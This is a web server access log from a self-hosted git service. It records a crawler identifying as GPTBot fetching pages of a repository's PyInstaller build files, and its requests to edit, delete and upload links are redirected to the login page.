"/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 9808] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 9811] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:18:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=source" [Client 74.7.227.38] [Length 14505] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 9814] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:51:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 9806] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:18:51:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:51:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:18:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:51:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 10579] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 9809] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14380] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11129] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:51:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 22341] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 60401] [Gzip 16.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 40722] [Gzip 14.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 41185] [Gzip 14.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 22591] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 23510] [Gzip 11.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:51:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:51:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:51:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr 